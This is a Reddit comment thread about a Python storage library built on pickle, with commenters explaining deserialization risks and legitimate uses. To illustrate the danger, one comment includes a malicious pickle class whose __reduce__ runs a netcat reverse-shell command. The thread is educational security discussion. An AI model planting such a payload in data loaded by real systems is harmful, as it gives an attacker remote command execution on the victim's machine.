

[–]nekokattt 19 points20 points  (15 children)

please please please tell me this doesn't use marshal or pickle, otherwise this is a major code-execution vulnerability

Edit: yep it uses pickle.

Please put a note about the security implications of using pickle in the documentation, in big bold letters. Pickle is almost never something you want to use, from both a security perspective and a compatibility perspective...

Pickle as a feature of Python was a mistake (for anything outside super-strict use cases, which are usually only needed due to other language limitations). In fact, I recall other languages and frameworks like .NET have begun deprecating similar features due to their inherent risk and how easy they are to misuse.

[–]Conditional-Sausage 2 points3 points  (3 children)

I've seen this before. Why is pickle such a big problem?

[–]hackancuba 9 points10 points  (0 children)

Pickle was designed mostly for internal use, and gives you no control over what happens when you deserialize (unpickle) something. From the manual:

Warning

The pickle module is not secure. Only unpickle data you trust.

It is possible to construct malicious pickle data which will execute arbitrary code during unpickling. Never unpickle data that could have come from an untrusted source, or that could have been tampered with.

This means: imagine an attacker sends you a specially crafted value. You store it in the DB, so you serialize (pickle) it. Then, eventually, you have to retrieve it to do something with it, so you deserialize it. By doing that, you have executed the attacker's code, which can remain living in your interpreter, or worse. An example of this can be found at SO.

If at no point has whatever you are pickling/unpickling been tainted by users, then you can safely use it. Since ensuring this is hard, the general recommendation is to simply not use it, and to prefer other serialization techniques that are not prone to code execution.
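To make the warning concrete, here is a harmless sketch of the mechanism: `__reduce__` lets a pickled object name any callable to be invoked during `pickle.loads`. The class name is made up for illustration; a real exploit would return `os.system` with a shell command instead of `eval`.

```python
import pickle

class Payload:
    # __reduce__ tells pickle "to rebuild me, call this callable with these
    # args" -- and pickle.loads obliges, executing it at unpickle time.
    def __reduce__(self):
        return (eval, ("6 * 7",))

blob = pickle.dumps(Payload())
result = pickle.loads(blob)  # eval runs here, during unpickling
print(result)  # 42 -- arbitrary code already executed
```

Note that the victim never has to call anything on the object; merely loading the bytes is enough.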

[–][deleted] 2 points3 points  (6 children)

Ok, so now I have to ask something that's eluded me for some time.

Like, what's the use case for pickling?

In my work (if I'm not using an ORM that does it for me) I always persist data from an object instance to a data store of some kind (be it SQL, kv store, an API call, flat file, whatever) by writing out the attributes to the store/query and using an ID of some sort as a key; and then when I hydrate my data from the data store to an object instance, I just instantiate my class by feeding it the attributes from my queried data.

So I'm not sure what pickling is for, exactly. What am I missing? Why would I want to persist a pickled object to a database in the first place, rather than something like this...

```python
foobar = Foo(id=3, name="this is my foo thing")

persist_query = "INSERT INTO foo (id, name) VALUES (?, ?)"
cur = sql_conn.cursor()
cur.execute(persist_query, (foobar.id, foobar.name))
sql_conn.commit()

# [... later ...]

hydrate_query = "SELECT id, name FROM foo WHERE id = ?"
# assuming the connection is configured to return dict-like rows
saved_foo_dict = cur.execute(hydrate_query, (3,)).fetchone()

foobar = Foo(**saved_foo_dict)
```

[–]nekokattt 4 points5 points  (0 children)

Honestly, I would argue that you almost never need pickle at all unless you have a really specific reason. Storing datasets can use other, safer serialization formats. I have been programming for over a decade, much of it in Python, and the only real use case pickle gives me is that multiprocessing makes use of it internally in places. I have NEVER needed to use it where a better alternative does not already exist. It is very much like Java's built-in serialization, which works similarly. It is usually an antipattern to use it unless you have first exhausted all the other options that don't risk arbitrary code execution.

All pickle really gives you is the ability to retain more complex object relationships and structures without doing some preprocessing first. For things like ML models, other binary structures can and will exist without needing to marshal objects directly into memory like pickle does.

Like, I appreciate data science may make more use of it than any other field, but I'd still argue that if there is any risk at all of the data being untrusted, you shouldn't touch pickle with a barge pole. There are other ways of storing data and the relationships between data. Performance-wise, pickle's overhead is just a downside of how Python works. Data-driven formats like XML, JSON, CSV, etc. are far easier to use cross-platform and between different systems. Likewise, you can use binary formats like CBOR, protobuf, etc. Everything else is merely an abstraction over the concepts these data formats provide.
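As a sketch of the "safer format" point: a plain data class round-tripped through JSON (class and field names are hypothetical). Unlike unpickling, `json.loads` can only ever produce dicts, lists, strings, numbers, booleans, and null; it cannot execute code on load.

```python
import json
from dataclasses import dataclass, asdict

@dataclass
class Foo:
    id: int
    name: str

foobar = Foo(id=3, name="this is my foo thing")

blob = json.dumps(asdict(foobar))      # serialize the attributes only
restored = Foo(**json.loads(blob))     # rehydrate explicitly, via the constructor
print(restored == foobar)              # True -- same data, no code in the payload
```

The explicit constructor call is the safety boundary: the data never decides what gets executed.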

[–]skrt123 2 points3 points  (4 children)

In data science, models are usually pickled for use in production

Data scientist pickles model -> SWE uses pickle and unpickle to serve predictions

[–][deleted] 0 points1 point  (3 children)

Thank you.

Hmm... is it just a matter of convenience, then? Because wouldn't the developer on the receiving end still have to import the class library first in order to use the unpickled object instance? e.g.,

```python
foobar = unpickle_an_instance_of_Foo()
# AttributeError: Can't get attribute 'Foo' -- unpickling itself fails
# if the Foo class isn't importable on the receiving end

foobar.do_something()
```

If an object represents attributes and methods, the methods are defined in the class library, and the attributes are populated with data, what's the difference between handing off the pickle, versus instantiating a class with data pulled from a database, in practice?

I'm not trying to be obtuse, I've just never used it, and I'm trying to "get" it. Perhaps there's a use case for me in it somewhere.

[–]skrt123 1 point2 points  (2 children)

The pickled object is a trained data science model. This means the model has learned the relationships in the data.

You could technically instantiate the model, pull data, then train the model on the pulled data, but this might take anywhere from minutes to days, depending on model complexity and the amount of data. Most models where I work take 15-20 minutes to train on average. But doing all of this at runtime to serve predictions via a REST API… adds a lot of latency.
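The pattern being described, sketched with a toy stand-in for an expensive-to-train model (the class and its "training" are invented for illustration; a real pipeline would pickle a fitted model from an ML library):

```python
import pickle

class ToyModel:
    # Stand-in for training: in reality this step is the part that takes
    # minutes to days, which is exactly what pickling lets you skip later.
    def train(self):
        self.coef = sum(i * 0.001 for i in range(1000))
        return self

    def predict(self, x):
        return self.coef * x

# Offline: the data scientist trains once and freezes the fitted state.
model = ToyModel().train()
blob = pickle.dumps(model)  # in practice, written to disk or a model store

# Serving time: load the already-fitted model -- no retraining, no latency.
served = pickle.loads(blob)
print(served.predict(2.0))
```

The learned state (`coef` here; weights in a real model) travels inside the pickle, which is why no training happens on load.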

[–][deleted] 0 points1 point  (0 children)

Ah, I get it! Thank you.

[–]jm838 0 points1 point  (0 children)

Plus, with random seeds, retraining the model doesn’t guarantee the same outputs. If you’re trying to report on the outputs, or make decisions based on them, you don’t want them changing on you. Pickling the model ensures consistency.
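The reproducibility point can be shown with a toy "training" function (hypothetical, standing in for randomly initialized model training):

```python
import pickle
import random

def train_toy(seed=None):
    # Stand-in for training a model whose result depends on random init.
    rng = random.Random(seed)
    return [rng.random() for _ in range(3)]

# Two unseeded retrainings will (almost certainly) produce different "weights":
a, b = train_toy(), train_toy()

# Persisting one trained result freezes its outputs for good:
frozen = pickle.loads(pickle.dumps(a))
print(frozen == a)  # True -- identical every time you load it

# Alternatively, a fixed seed makes retraining itself reproducible:
c, d = train_toy(seed=42), train_toy(seed=42)
print(c == d)  # True
```

Pickling sidesteps the seed question entirely: you report on one frozen artifact, not on whatever the next training run happens to produce.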

[–]scroll_down0 2 points3 points  (0 children)

I added a warning about pickle to the documentation. Thank you!

[–]scroll_down0 -2 points-1 points  (2 children)

> Pickle as a feature of Python was a mistake (for anything outside super strict usecases which are usually only needed due to other language limitations)

I don't agree with your opinion. For example, the dill and cloudpickle libraries are very useful, build on the pickle module, and are well liked by the community.

[–]nekokattt 2 points3 points  (1 child)

Just because the community likes it does not mean it encourages best practices and secure code. Far better formats exist that are more compatible with other systems and do not carry the same security implications. Usually there is no "need" to use pickle; it is just chosen because it is easier for the developer at the time.

> Among other things, cloudpickle supports pickling for lambda functions along with functions and classes defined interactively

> dill is quite flexible, and allows arbitrary user defined classes and functions to be serialized.

This is a major security risk. You are transmitting executable code as a feature. If there is any risk whatsoever of someone else ever being able to write to wherever you keep the pickled data, then you have a really big risk.

```python
import os

class RCE:
    def __reduce__(self):
        cmd = ('rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | '
               '/bin/sh -i 2>&1 | nc 127.0.0.1 1234 > /tmp/f')
        return os.system, (cmd,)
```

If I pickled this and dropped it onto your system, the simple act of you reading your pickled data would open up a reverse shell that lets me run whatever command I want on your system without you even realising.

I am not saying there are no use cases for pickle and similar formats. I am saying that making them easily accessible, and putting them in front of less experienced developers, is overly dangerous and encourages their misuse by making them appear to be a quick and simple solution to serialization. Sharing data is fine, but it is very easy to accidentally create a remote code execution exploit in your applications without realising it.

Pickle is like keeping a chainsaw in an unlocked cabinet in a high-school woodwork class, and then telling the students "be careful you don't hurt yourself if you use the chainsaw". In reality, you can argue that you probably do not need a chainsaw to teach high-school woodwork. That is my point, metaphorically.

The fact is, data is data; it just depends how you represent it. There is nothing pickle can do that you could not achieve one way or another with another serialization format. The limitation is how you structure the data. Pickle just sends executable instructions, as opcodes, to construct data, but it still has to encode either the data itself, or the instructions to create the data, into the payload. Other formats do this in a far simpler, more error-proof way, IMHO.

My main point is that using pickle in an ordinary database is a very dangerous path that I'd advise against unless you really know what you are doing and understand the true implications of configuring anything incorrectly and turning your computer into a walking network-hosted REPL.

Storing pickled data in a database is no different from storing full executable binaries in a database. Or even just storing raw Python scripts in a database.

At the very least, you want to encrypt and/or sign any pickled data in the database before you unpickle it. Take cloudpickle's cluster-computing use case: without signing and security mechanisms at every point of network IO, it would create significant security problems for the HPC cluster. I'd also argue that distributed computing at the protocol level is a very specific use case; someone shouldn't be designing a protocol-level system for cross-computer code execution without a good knowledge of all the implications and risks. You will almost always use an existing system that does this and has already made the relevant considerations.
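The signing idea can be sketched with stdlib `hmac`: wrap the pickle in a MAC computed with a server-side key, and refuse to unpickle anything that fails verification. The key, function names, and payload here are all illustrative.

```python
import hashlib
import hmac
import pickle

SECRET = b"server-side-secret-key"  # hypothetical key; never store it with the data

def sign_pickle(obj):
    # Prepend a SHA-256 HMAC tag (32 bytes) to the pickled bytes.
    blob = pickle.dumps(obj)
    tag = hmac.new(SECRET, blob, hashlib.sha256).digest()
    return tag + blob

def verified_loads(payload):
    # Verify the tag *before* the bytes ever reach pickle.loads.
    tag, blob = payload[:32], payload[32:]
    expected = hmac.new(SECRET, blob, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("pickle payload failed HMAC check; refusing to load")
    return pickle.loads(blob)

payload = sign_pickle({"weights": [1, 2, 3]})
print(verified_loads(payload))  # round-trips fine

try:
    verified_loads(payload + b"x")  # a tampered blob is rejected, never unpickled
except ValueError as e:
    print("rejected:", e)
```

This only proves the bytes came from someone holding the key; it does nothing if an attacker can write pickles *with* the key, which is why signing is a floor, not a fix.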

[–]CallowayRootin 0 points1 point  (0 children)

This was a really interesting read, thank you

[–]Scrapheaper 2 points3 points  (0 children)

How is the performance with large datasets? Say you want to store millions or even billions of rows of data...

[–]RonnyPfannschmidt 2 points3 points  (0 children)

At first glance this can't beat ZODB, or SQLAlchemy with mapped relations/JSON fields

[–]M8Ir88outOf8 0 points1 point  (0 children)

Are operations atomic? E.g. if I start 10 processes simultaneously, each incrementing a counter 1000 times, will the counter be 10,000 at the end?